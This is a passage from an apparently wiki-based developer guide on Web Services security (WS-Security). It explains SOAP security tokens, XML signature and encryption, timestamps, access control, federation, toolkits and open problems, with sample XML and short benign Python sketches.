       &amp;lt;dsig:Signature xmlns:dsig=&amp;quot;http://www.w3.org/2000/09/xmldsig#&amp;quot; Id=&amp;quot;sb738c7&amp;quot;&amp;gt;&lt;br /&gt;
 	&amp;lt;dsig:SignedInfo Id=&amp;quot;obLkHzaCOrAW4kxC9az0bLA22&amp;quot;&amp;gt;&lt;br /&gt;
 		...&lt;br /&gt;
 	  &amp;lt;dsig:Reference URI=&amp;quot;#s91397860&amp;quot;&amp;gt;&lt;br /&gt;
 		...									&lt;br /&gt;
             &amp;lt;dsig:DigestValue&amp;gt;5R3GSp+OOn17lSdE0knq4GXqgYM=&amp;lt;/dsig:DigestValue&amp;gt;&lt;br /&gt;
 	  &amp;lt;/dsig:Reference&amp;gt;&lt;br /&gt;
 	  &amp;lt;/dsig:SignedInfo&amp;gt;&lt;br /&gt;
 	  &amp;lt;dsig:SignatureValue Id=&amp;quot;a9utKU9UZk&amp;quot;&amp;gt;LIkagbCr5bkXLs8l...&amp;lt;/dsig:SignatureValue&amp;gt;&lt;br /&gt;
 	  &amp;lt;dsig:KeyInfo&amp;gt;&lt;br /&gt;
 	  &amp;lt;wsse:SecurityTokenReference&amp;gt;&lt;br /&gt;
 	    &amp;lt;wsse:Reference URI=&amp;quot;#aXhOJ5&amp;quot; ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509v3&amp;quot;/&amp;gt;&lt;br /&gt;
 	  &amp;lt;/wsse:SecurityTokenReference&amp;gt;&lt;br /&gt;
         &amp;lt;/dsig:KeyInfo&amp;gt;&lt;br /&gt;
       &amp;lt;/dsig:Signature&amp;gt;&lt;br /&gt;
     &amp;lt;/wsse:Security&amp;gt;&lt;br /&gt;
   &amp;lt;/soap:Header&amp;gt;&lt;br /&gt;
   &amp;lt;soap:Body xmlns:wsu=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd&amp;quot; wsu:Id=&amp;quot;s91397860&amp;quot;&amp;gt;&lt;br /&gt;
     &amp;lt;xenc:EncryptedData xmlns:xenc=&amp;quot;http://www.w3.org/2001/04/xmlenc#&amp;quot; Id=&amp;quot;aDNa2iD&amp;quot; Type=&amp;quot;http://www.w3.org/2001/04/xmlenc#Content&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xenc:EncryptionMethod Algorithm=&amp;quot;http://www.w3.org/2001/04/xmlenc#tripledes-cbc&amp;quot;/&amp;gt;&lt;br /&gt;
       &amp;lt;xenc:CipherData&amp;gt;&lt;br /&gt;
 	&amp;lt;xenc:CipherValue&amp;gt;XFM4J6C...&amp;lt;/xenc:CipherValue&amp;gt;&lt;br /&gt;
       &amp;lt;/xenc:CipherData&amp;gt;&lt;br /&gt;
     &amp;lt;/xenc:EncryptedData&amp;gt;&lt;br /&gt;
   &amp;lt;/soap:Body&amp;gt;&lt;br /&gt;
 &amp;lt;/soap:Envelope&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Types of tokens ===&lt;br /&gt;
&lt;br /&gt;
A WSS Header may have the following types of security tokens in it:&lt;br /&gt;
&lt;br /&gt;
* Username token&lt;br /&gt;
&lt;br /&gt;
Defines mechanisms to pass a username and, optionally, a password – the latter is described in the Username Token profile document. Unless the whole token is encrypted, a message which includes a clear-text password should always be transmitted via a secured channel. In situations where the target Web Service has access to clear-text passwords for verification (this might not be possible with LDAP or some other user directories, which do not return clear-text passwords), using a hashed version with a nonce and a timestamp is generally preferable. The profile document defines an unambiguous algorithm for producing the password hash: &lt;br /&gt;
&lt;br /&gt;
''Password_Digest = Base64 ( SHA-1 ( nonce + created + password ) )''&lt;br /&gt;
&lt;br /&gt;
* Binary token&lt;br /&gt;
&lt;br /&gt;
These are used to convey binary data, such as X.509 certificates, in a text-encoded format, Base64 by default. The core specification defines the BinarySecurityToken element, while profile documents specify additional attributes and sub-elements to handle attachment of various tokens. Presently, both the X.509 and the Kerberos profiles have been adopted.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;wsse:BinarySecurityToken EncodingType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary&amp;quot; ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509v3&amp;quot; wsu:Id=&amp;quot;aXhOJ5&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''        MIICtzCCAi...''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;/wsse:BinarySecurityToken&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* XML token&lt;br /&gt;
&lt;br /&gt;
These are meant for any kind of XML-based tokens, but primarily for SAML assertions. The core specification merely mentions the possibility of inserting such tokens, leaving all details to the profile documents. At the moment, the SAML 1.1 profile has been accepted by OASIS.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;saml:Assertion AssertionID=&amp;quot;1106844369755&amp;quot; IssueInstant=&amp;quot;2005-01-27T16:46:09.755Z&amp;quot; Issuer=&amp;quot;www.my.com&amp;quot; MajorVersion=&amp;quot;1&amp;quot; MinorVersion=&amp;quot;1&amp;quot; xmlns:saml=&amp;quot;urn:oasis:names:tc:SAML:1.0:assertion&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''		...				''&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;/saml:Assertion&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Although technically it is not a security token, a Timestamp element may be inserted into a security header to ensure message’s freshness. See the further reading section for a design pattern on this.&lt;br /&gt;
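The password digest algorithm given above for the Username token can be sketched in Python using only the standard library; the nonce, timestamp, and password values here are invented for illustration: &lt;br /&gt;

```python
import base64
import hashlib
import os

# Inputs per the Username Token profile: a random nonce, the wsu:Created
# timestamp, and the clear-text password (illustrative values).
nonce = os.urandom(16)
created = "2005-01-27T16:46:10Z"
password = "secret"

# Password_Digest = Base64( SHA-1 ( nonce + created + password ) )
digest = base64.b64encode(
    hashlib.sha1(
        nonce + created.encode("utf-8") + password.encode("utf-8")
    ).digest()
).decode("ascii")
```

Because the nonce is random and the timestamp is fresh, a captured digest cannot simply be replayed later, provided the service tracks recently seen nonces.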
&lt;br /&gt;
===Referencing message parts ===&lt;br /&gt;
&lt;br /&gt;
In order to retrieve security tokens passed in the message, or to identify signed and encrypted message parts, the core specification adopts a special attribute, wsu:Id. The only requirement on this attribute is that the values of such IDs be unique within the scope of the XML document where they are defined. Its use has a significant advantage for intermediate processors, as it does not require understanding of the message’s XML Schema. Unfortunately, the XML Signature and Encryption specifications do not allow for attribute extensibility (i.e. they have a closed schema), so, when trying to locate signature or encryption elements, the local IDs of the Signature and Encryption elements must be considered first.&lt;br /&gt;
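The schema-independence of wsu:Id can be sketched as follows in Python: a generic processor simply scans for the attribute without knowing anything about the payload’s schema (the toy document and function name are invented for illustration): &lt;br /&gt;

```python
import xml.etree.ElementTree as ET

WSU = ("http://docs.oasis-open.org/wss/2004/01/"
       "oasis-200401-wss-wssecurity-utility-1.0.xsd")

# A toy payload: the processor knows nothing about its schema,
# only that referenced parts are labeled with wsu:Id.
doc = ET.fromstring(
    '<order xmlns:wsu="' + WSU + '">'
    '<item wsu:Id="s91397860">10 widgets</item>'
    '<note>unsigned remark</note>'
    '</order>'
)

def find_by_wsu_id(root, wanted):
    # Scan every element for a matching wsu:Id attribute.
    for el in root.iter():
        if el.get("{" + WSU + "}Id") == wanted:
            return el
    return None

target = find_by_wsu_id(doc, "s91397860")
```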
&lt;br /&gt;
The WSS core specification also defines a general mechanism for referencing security tokens via the SecurityTokenReference element. An example of such an element, referring to a SAML assertion in the same header, is provided below:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;wsse:SecurityTokenReference wsu:Id=&amp;quot;aZG0sGbRpXLySzgM1X6aSjg22&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	  &amp;lt;wsse:KeyIdentifier ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/XX/oasis-2004XX-wss-saml-token-profile-1.0#SAMLAssertionID&amp;quot; wsu:Id=&amp;quot;a2tv1Uz&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''            1106844369755''&lt;br /&gt;
&lt;br /&gt;
''          &amp;lt;/wsse:KeyIdentifier&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;/wsse:SecurityTokenReference&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
As this element was designed to refer to pretty much any possible token type (including encryption keys, certificates, SAML assertions, etc.), both internal and external to the WSS Header, it is enormously complicated. The specification recommends using two of its four possible reference types – Direct References (by URI) and Key Identifiers (some kind of token identifier). Profile documents (SAML and X.509, for instance) provide additional extensions to these mechanisms to take advantage of the specific qualities of different token types.&lt;br /&gt;
&lt;br /&gt;
==Communication Protection Mechanisms ==&lt;br /&gt;
&lt;br /&gt;
As was already explained earlier (see 0), channel security, while providing important services, is not a panacea, as it does not solve many of the issues facing Web Service developers. WSS helps address some of them at the SOAP message level, using the mechanisms described in the sections below.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
===Integrity ===&lt;br /&gt;
&lt;br /&gt;
The WSS specification makes use of the XML-dsig standard to ensure message integrity, restricting its functionality in certain cases; for instance, only explicitly referenced elements can be signed (i.e. no Enveloping or Enveloped signature modes are allowed). Prior to signing an XML document, a transformation is required to create its canonical representation, taking into account the fact that XML documents can be represented in a number of semantically equivalent ways. There are two main transforms defined by the XML Digital Signature WG at W3C, the Inclusive and Exclusive Canonicalization Transforms (C14N and EXC-C14N), which differ in the way namespace declarations are processed. The WSS core specification specifically recommends EXC-C14N, as it allows copying signed XML content into other documents without invalidating the signature.&lt;br /&gt;
&lt;br /&gt;
In order to provide a uniform way of addressing signed tokens, WSS adds a Security Token Reference (STR) Dereference Transform option, which is comparable to dereferencing a pointer to an object of a specific data type in programming languages. Similarly, in addition to the XML Signature-defined ways of addressing signing keys, WSS allows references to signing security tokens through the STR mechanism (explained in 0), extended by token profiles to accommodate specific token types. A typical signature example is shown in the earlier sample in section 0.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
Typically, an XML signature is applied to secure elements such as the SOAP Body and the timestamp, as well as any user credentials passed in the request. There is an interesting twist when a particular element is both signed and encrypted, since these operations may follow (even repeatedly) in any order, and knowledge of their ordering is required for signature verification. To address this issue, the WSS core specification requires that each new element be prepended to the security header, thus defining the “natural” order of operations. A particularly nasty problem arises when there are several security headers in a single SOAP message using overlapping signature and encryption blocks, as in this case nothing points to the right order of operations.&lt;br /&gt;
&lt;br /&gt;
===Confidentiality ===&lt;br /&gt;
&lt;br /&gt;
For confidentiality protection, WSS relies on yet another standard, XML Encryption. Similarly to XML-dsig, this standard operates on selected elements of the SOAP message, but it then replaces the encrypted element’s data with an &amp;lt;xenc:EncryptedData&amp;gt; sub-element carrying the encrypted bytes. For encryption efficiency, the specification recommends using a unique symmetric key, which is then encrypted with the recipient’s public key and prepended to the security header in an &amp;lt;xenc:EncryptedKey&amp;gt; element. A SOAP message with an encrypted body is shown in section 0.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
===Freshness ===&lt;br /&gt;
&lt;br /&gt;
SOAP message freshness is addressed via the timestamp mechanism – each security header may contain just one such element, which states, in UTC format, the creation and expiration moments of the security header. It is important to realize that the timestamp applies to the WSS Header, not to the SOAP message itself, since the latter may contain multiple security headers, each with a different timestamp. There is an unresolved problem with this “single timestamp” approach: once the timestamp is created and signed, it is impossible to update it without breaking existing signatures, even in the case of a legitimate change to the WSS Header.&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;wsu:Timestamp wsu:Id=&amp;quot;afc6fbe-a7d8-fbf3-9ac4-f884f435a9c1&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;wsu:Created&amp;gt;2005-01-27T16:46:10Z&amp;lt;/wsu:Created&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;wsu:Expires&amp;gt;2005-01-27T18:46:10Z&amp;lt;/wsu:Expires&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;/wsu:Timestamp&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
If a timestamp is included in a message, it is typically signed to prevent tampering and replay attacks. No mechanism is foreseen to address the clock synchronization issue (which, as was already pointed out earlier, is generally not an issue in modern-day systems) – as far as the WSS mechanics are concerned, this has to be addressed out-of-band. See the further reading section for a design pattern addressing this issue.&lt;br /&gt;
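A freshness check over the Created/Expires pair might be sketched as follows in Python; the five-minute skew allowance is an assumption standing in for whatever tolerance the parties agree on out-of-band, and the function names are illustrative: &lt;br /&gt;

```python
from datetime import datetime, timedelta, timezone

def parse_utc(ts: str) -> datetime:
    # wsu timestamps use the UTC "Zulu" format, e.g. 2005-01-27T16:46:10Z.
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)

def is_fresh(created: str, expires: str, now: datetime,
             skew: timedelta = timedelta(minutes=5)) -> bool:
    # Accept the header only inside the [Created, Expires] window,
    # widened by an allowed clock skew agreed out-of-band.
    return parse_utc(created) - skew <= now <= parse_utc(expires) + skew

# Check the sample timestamp from the text against a receipt time inside
# its validity window.
now = datetime(2005, 1, 27, 17, 0, 0, tzinfo=timezone.utc)
ok = is_fresh("2005-01-27T16:46:10Z", "2005-01-27T18:46:10Z", now)
```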
&lt;br /&gt;
==Access Control Mechanisms ==&lt;br /&gt;
&lt;br /&gt;
When it comes to access control decisions, Web Services do not offer specific protection mechanisms by themselves – they just have the means to carry the tokens and data payloads in a secure manner between source and destination SOAP endpoints. &lt;br /&gt;
&lt;br /&gt;
For a more complete description of access control tasks, please refer to other sections of this Development Guide.&lt;br /&gt;
&lt;br /&gt;
===Identification ===&lt;br /&gt;
&lt;br /&gt;
Identification represents a claim to a certain identity, which is expressed by attaching certain information to the message. This can be a username, a SAML assertion, a Kerberos ticket, or any other piece of information from which the service can infer who the caller claims to be. &lt;br /&gt;
&lt;br /&gt;
WSS represents a very good way to convey this information, as it defines an extensible mechanism for attaching various token types to a message (see 0). It is the receiver’s job to extract the attached token and figure out which identity it carries, or to reject the message if it can find no acceptable token in it.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
===Authentication ===&lt;br /&gt;
&lt;br /&gt;
Authentication can come in two flavors – credentials verification or token validation. The subtle difference between the two is that tokens are issued after some kind of authentication has already happened prior to the current invocation, and they usually contain the user’s identity along with proof of its integrity. &lt;br /&gt;
&lt;br /&gt;
WSS offers support for a number of standard authentication protocols by defining a binding mechanism for transmitting protocol-specific tokens and reliably linking them to the sender. However, the mechanics of proving that the caller is who he claims to be are completely at the Web Service’s discretion. Whether it takes the supplied username and password hash and checks them against the backend user store, or extracts the subject name from the X.509 certificate used to sign the message, verifies the certificate chain, and looks up the user in its store – at the moment, there are no requirements or standards dictating that it be done one way or another. &lt;br /&gt;
&lt;br /&gt;
===Authorization ===&lt;br /&gt;
&lt;br /&gt;
XACML may be used for expressing authorization rules, but its usage is not Web Service-specific – it has a much broader scope. So, whatever policy- or role-based authorization mechanism the host server already has in place will most likely be utilized to protect the deployed Web Services as well. &lt;br /&gt;
&lt;br /&gt;
Depending on the implementation, there may be several layers of authorization involved at the server. For instance, JSRs 224 (JAX-RPC 2.0) and 109 (Implementing Enterprise Web Services), which define the Java binding for Web Services, specify implementing Web Services in J2EE containers. This means that when a Web Service is accessed, there will be a URL authorization check executed by the J2EE container, followed by a check at the Web Service layer for the Web Service-specific resource. The granularity of such checks is implementation-specific and is not dictated by any standards. In the Windows universe it happens in a similar fashion, since IIS executes its access checks on incoming HTTP calls before they reach the ASP.NET runtime, where the SOAP message is further decomposed and analyzed.&lt;br /&gt;
&lt;br /&gt;
===Policy Agreement ===&lt;br /&gt;
&lt;br /&gt;
Normally, Web Services’ communication is based on the endpoint’s public interface, defined in its WSDL file. This descriptor has sufficient details to express SOAP binding requirements, but it does not define any security parameters, leaving Web Service developers struggling to find out-of-band mechanisms to determine the endpoint’s security requirements. &lt;br /&gt;
&lt;br /&gt;
To make up for these shortcomings, the WS-Policy specification was conceived as a mechanism for expressing complex policy requirements and qualities – a sort of WSDL on steroids. Through the published policy, SOAP endpoints can advertise their security requirements, and their clients can apply appropriate measures of message protection when constructing requests. The general WS-Policy specification (actually comprised of three separate documents) also has extensions for specific policy types, one of them – for security – being WS-SecurityPolicy.&lt;br /&gt;
&lt;br /&gt;
If the requestor does not possess the required tokens, it can try obtaining them via a trust mechanism, using WS-Trust-enabled services, which are called to securely exchange various token types for the requested identity. &lt;br /&gt;
&lt;br /&gt;
[[Image: Using Trust Service.gif|Figure 5. Using Trust service]]&lt;br /&gt;
&lt;br /&gt;
Unfortunately, neither the WS-Policy nor the WS-Trust specification has been submitted for standardization to a public body; their development is progressing via private collaboration among several companies, although it has been opened up to other participants as well. On the positive side, several interoperability events have been conducted for these specifications, so the development process of these critical links in the Web Services’ security infrastructure is not a complete black box.&lt;br /&gt;
&lt;br /&gt;
==Forming Web Service Chains ==&lt;br /&gt;
&lt;br /&gt;
Many existing or planned implementations of SOA or B2B systems rely on dynamic chains of Web Services to accomplish various business-specific tasks, from taking orders through manufacturing and up to the distribution process. &lt;br /&gt;
&lt;br /&gt;
[[Image:Service Chain.gif|Figure 6: Service chain]]&lt;br /&gt;
&lt;br /&gt;
This is the theory. In practice, there are a lot of obstacles hidden along the way, one of the major ones being security concerns about publicly exposing processing functions to intranet- or Internet-based clients. &lt;br /&gt;
&lt;br /&gt;
Here are just a few of the issues that hamper Web Services interaction: incompatible authentication and authorization models for users, the degree of trust between the services themselves and the ways of establishing such trust, maintaining secure connections, and synchronizing user directories or otherwise exchanging users’ attributes. These issues are briefly tackled in the following paragraphs.&lt;br /&gt;
&lt;br /&gt;
===Incompatible user access control models ===&lt;br /&gt;
&lt;br /&gt;
As explained earlier, in section 0, Web Services themselves do not include separate extensions for access control, relying instead on the existing security framework. What they do provide, however, are mechanisms for discovering and describing security requirements of a SOAP service (via WS-Policy), and for obtaining appropriate security credentials via WS-Trust based services.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
===Service trust ===&lt;br /&gt;
&lt;br /&gt;
In order to establish mutual trust, a client and a service have to satisfy each other’s policy requirements. A simple and popular model is mutual certificate authentication via SSL, but it does not scale to open service models and supports only one authentication type. Services that require more flexibility have to use pretty much the same access control mechanisms as for users to establish each other’s identities prior to engaging in a conversation.&lt;br /&gt;
&lt;br /&gt;
===Secure connections ===&lt;br /&gt;
&lt;br /&gt;
Once trust is established, it would be impractical to require its confirmation on each interaction. Instead, a secure client-server link is formed and maintained for the entire time a client’s session is active. Again, the most popular mechanism today for maintaining such a link is SSL, but it is not a Web Service-specific mechanism, and it has a number of shortcomings when applied to SOAP communication, as explained in 0.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
===Synchronization of user directories ===&lt;br /&gt;
&lt;br /&gt;
This is a very acute problem when dealing with cross-domain applications, as user populations tend to change frequently across domains. So, how does a service in domain B decide whether to trust a user’s claim that he has already been authenticated in domain A? There are different aspects to this problem. The first is a common SSO mechanism, which implies that a user is known in both domains (through synchronization, or by some other means), and that authentication tokens from one domain are acceptable in the other. In the Web Services world, this would be accomplished by passing around a SAML or Kerberos token for the user. &lt;br /&gt;
&lt;br /&gt;
===Domain federation ===&lt;br /&gt;
&lt;br /&gt;
Another aspect of the problem arises when users are not shared across domains, and only the fact that a user with a certain ID has successfully authenticated in another domain is communicated – as would be the case with several large corporations that want to form a partnership but are reluctant to share customer details. The decision to accept such a request is then based on inter-domain procedures, which establish special trust relationships and allow such opaque tokens to be exchanged – an example of federation relationships. Of those efforts, the most notable example is the Liberty Alliance project, which is now being used as a basis for the SAML 2.0 specifications. The work in this area is still far from complete, and most existing deployments are closer to POC or internal pilot projects than to real cross-company deployments, although LA’s website does list some case studies of large-scale projects.&lt;br /&gt;
&lt;br /&gt;
==Available Implementations ==&lt;br /&gt;
&lt;br /&gt;
It is important to realize from the beginning that no security standard by itself is going to provide security for message exchanges – it is the installed implementations that assess the conformance of incoming SOAP messages to the applicable standards and appropriately secure the outgoing messages.&lt;br /&gt;
&lt;br /&gt;
===.NET – Web Service Extensions ===&lt;br /&gt;
&lt;br /&gt;
Since new standards are being developed at a rather quick pace, the .NET platform does not try to catch up immediately, but uses Web Service Extensions (WSE) instead. WSE, currently at version 2.0, adds development and runtime support for the latest Web Service security standards to the platform and development tools, even while they are still “work in progress”. Once standards mature, their support is incorporated into new releases of the .NET platform, which is what is going to happen when .NET 2.0 finally ships. The next release of WSE, 3.0, is going to coincide with the VS 2005 release and will take advantage of the latest innovations of the .NET 2.0 platform in the messaging and Web Application areas.&lt;br /&gt;
&lt;br /&gt;
Considering that Microsoft is one of the most active players in the Web Service security area, and recognizing its influence in the industry, its WSE implementation is probably one of the most complete and up to date, and it is strongly advisable to run at least a quick interoperability check with WSE-secured .NET Web Service clients. If you have a Java-based Web Service and interoperability is a requirement (which is usually the case), then in addition to the questions of security testing, one needs to keep in mind the basic interoperability between Java and .NET Web Service data structures. &lt;br /&gt;
&lt;br /&gt;
This is especially important since current versions of the .NET Web Service tools frequently do not cleanly handle the WS-Security and related XML schemas as published by OASIS, so some creativity on the part of a Web Service designer is needed. That said, the WSE package itself contains very rich and well-structured functionality, which can be utilized both with ASP.NET-based and standalone Web Service clients to check incoming SOAP messages and secure outgoing ones at the infrastructure level, relieving Web Service programmers from having to know these details. Among other things, WSE 2.0 supports the most recent set of WS-Policy and WS-Security profiles, providing for basic message security, plus WS-Trust with WS-SecureConversation. Those are needed for establishing secure exchanges and sessions – similar to what SSL does at the transport level, but applied to message-based communication.&lt;br /&gt;
&lt;br /&gt;
===Java toolkits ===&lt;br /&gt;
&lt;br /&gt;
Most of the publicly available Java toolkits work at the level of XML security, i.e. XML-dsig and XML-enc – such as IBM’s XML Security Suite and Apache’s XML Security Java project. Java’s JSR 105 and JSR 106 (still not finalized) define Java bindings for signatures and encryption, which will allow plugging in implementations as JCA providers once work on those JSRs is completed. &lt;br /&gt;
&lt;br /&gt;
Moving one level up, to address Web Services themselves, the picture becomes muddier – at the moment, there are many implementations in various stages of incompleteness. For instance, Apache is currently working on the WSS4J project, which is moving rather slowly, and there is a commercial software package from Phaos (now owned by Oracle), which suffers from a lot of implementation problems.&lt;br /&gt;
&lt;br /&gt;
A popular choice among Web Service developers today is Sun’s JWSDP, which includes support for Web Service security. However, its support for the Web Service security specifications in version 1.5 is limited to an implementation of the core WSS standard with the username and X.509 certificate profiles. Security features are implemented as part of the JAX-RPC framework and are configuration-driven, which allows for clean separation from the Web Service’s implementation.&lt;br /&gt;
&lt;br /&gt;
===Hardware, software systems ===&lt;br /&gt;
&lt;br /&gt;
This category includes complete systems, rather than toolkits or frameworks. On one hand, they usually provide rich functionality right off the shelf; on the other hand, their usage model is rigidly constrained by the solution’s architecture and implementation. This is in contrast to the toolkits, which do not provide any services by themselves, but hand system developers the tools necessary to include the desired Web Service security features in their products… or to shoot themselves in the foot by applying them inappropriately.&lt;br /&gt;
&lt;br /&gt;
These systems can be used at the infrastructure layer to verify incoming messages against the effective policy, checking signatures, tokens, etc., before passing them on to the target Web Service. When applied to outgoing SOAP messages, they act as a proxy, altering the messages to decorate them with the required security elements and to sign and/or encrypt them.&lt;br /&gt;
&lt;br /&gt;
Software systems are characterized by significant configuration flexibility, but comparatively slow processing. On the bright side, they often provide a high level of integration with the existing enterprise infrastructure, relying on the back-end user and policy stores to evaluate the credentials extracted from the WSS header in a broader context. An example of such a system is TransactionMinder from the former Netegrity – a Policy Enforcement Point for Web Services, layered on top of the Policy Server, which makes policy decisions by checking the extracted credentials against the configured stores and policies.&lt;br /&gt;
&lt;br /&gt;
For hardware systems, performance is the key – they have already broken the gigabyte processing threshold and allow for real-time processing of huge documents, decorated according to a variety of the latest Web Service security standards, not only WSS. Usage simplicity is another attractive point of these systems – in the most trivial cases, the hardware box may literally be dropped in, plugged in, and used right away. These qualities come at a price, however – the performance and simplicity hold only as long as the user stays within the pre-configured confines of the hardware box. The moment he tries to integrate with the back-end stores via callbacks (for those solutions that have this capability, since not all of them do), most of the advantages are lost. As an example of such a hardware device, Layer 7 Technologies provides the scalable SecureSpan Networking Gateway, which acts both as an inbound firewall and an outbound proxy to handle XML traffic in real time.&lt;br /&gt;
&lt;br /&gt;
==Problems ==&lt;br /&gt;
&lt;br /&gt;
As is probably clear from the previous sections, Web Services are still experiencing a lot of turbulence, and it will take a while before they can really catch on. Here is a brief look at what problems surround currently existing security standards and their implementations.&lt;br /&gt;
&lt;br /&gt;
===Immaturity of the standards ===&lt;br /&gt;
&lt;br /&gt;
Most of the standards are either very recent (a couple of years old at most) or still being developed. Although standards development is done in committees, which presumably reduces risk through an exhaustive reviewing and commenting process, some error scenarios still slip in periodically, as no theory can possibly match the testing that results from the pounding of thousands of developers working in the field. &lt;br /&gt;
&lt;br /&gt;
Additionally, it does not help that, for political reasons, some of these standards are withheld from the public process, which is the case with many standards from the WSA arena (see 0), or that some of the efforts are duplicated, as was the case with the LA and WS-Federation specifications.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
===Performance ===&lt;br /&gt;
&lt;br /&gt;
XML parsing is a slow task – an accepted reality – and SOAP processing slows it down even more. With expensive cryptographic and textual conversion operations thrown into the mix, these tasks become a performance bottleneck, even with the latest crypto- and XML-processing hardware solutions offered today. All of the products currently on the market face this issue, and they are trying to resolve it with varying degrees of success. &lt;br /&gt;
&lt;br /&gt;
Hardware solutions, while substantially (by orders of magnitude) improving performance, cannot always be used as the optimal solution, as they cannot easily be integrated with the existing back-end software infrastructure – at least, not without making performance sacrifices. Another consideration in deciding whether hardware-based systems are the right solution is that they are usually highly specialized in what they do, while modern Application Servers and security frameworks can usually offer a much greater variety of protection mechanisms, protecting not only Web Services but also other deployed applications in a uniform and consistent way.&lt;br /&gt;
&lt;br /&gt;
===Complexity and interoperability ===&lt;br /&gt;
&lt;br /&gt;
As can be deduced from the previous sections, Web Service security standards are fairly complex and have a very steep learning curve associated with them. Most of the current products dealing with Web Service security suffer from very mediocre usability due to the complexity of the underlying infrastructure. Configuring all the different policies, identities, keys, and protocols takes a lot of time and a good understanding of the technologies involved, as most of the time the errors that end users see have very cryptic and misleading descriptions. &lt;br /&gt;
&lt;br /&gt;
In order to help administrators and reduce security risks from service misconfigurations, many companies develop policy templates, which group together best practices for protecting incoming and outgoing SOAP messages. Unfortunately, this work is not currently on the radar of any of the standards bodies, so it appears unlikely that such templates will be released for public use any time soon. Closest to this effort may be WS-I’s Basic Security Profile (BSP), which tries to define rules for better interoperability among Web Services, using a subset of common security features from various security standards like WSS. However, this work is not aimed at supplying administrators with ready-for-deployment security templates matching the most popular business use cases, but rather at establishing the least common denominator.&lt;br /&gt;
&lt;br /&gt;
===Key management ===&lt;br /&gt;
&lt;br /&gt;
Key management usually lies at the foundation of any other security activity, as most protection mechanisms rely on cryptographic keys one way or another. While Web Services have the XKMS protocol for key distribution, local key management still presents a huge challenge in most cases, since the PKI mechanism has a lot of well-documented deployment and usability issues. Systems that opt for homegrown key management mechanisms run significant risks in many cases, since the questions of storing, updating, and recovering secret and private keys are more often than not inadequately addressed in such solutions.&lt;br /&gt;
&lt;br /&gt;
==Further Reading ==&lt;br /&gt;
&lt;br /&gt;
* SearchSOA, SOA needs practical operational governance, Toufic Boubez&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://searchsoa.techtarget.com/news/interview/0,289202,sid26_gci1288649,00.html?track=NL-110&amp;amp;ad=618937&amp;amp;asrc=EM_NLN_2827289&amp;amp;uid=4724698&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Whitepaper: Securing XML Web Services: XML Firewalls and XML VPNs&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://layer7tech.com/new/library/custompage.html?id=4&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* eBizQ, The Challenges of SOA Security, Peter Schooff&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.ebizq.net/blogs/news_security/2008/01/the_complexity_of_soa_security.php&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Piliptchouk, D., WS-Security in the Enterprise, O’Reilly ONJava&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.onjava.com/pub/a/onjava/2005/02/09/wssecurity.html&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.onjava.com/pub/a/onjava/2005/03/30/wssecurity2.html&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* WS-Security OASIS site&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.oasis-open.org/committees/tc_home.php?wg_abbrev=wss&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* Microsoft, ''What’s new with WSE 3.0''&lt;br /&gt;
&lt;br /&gt;
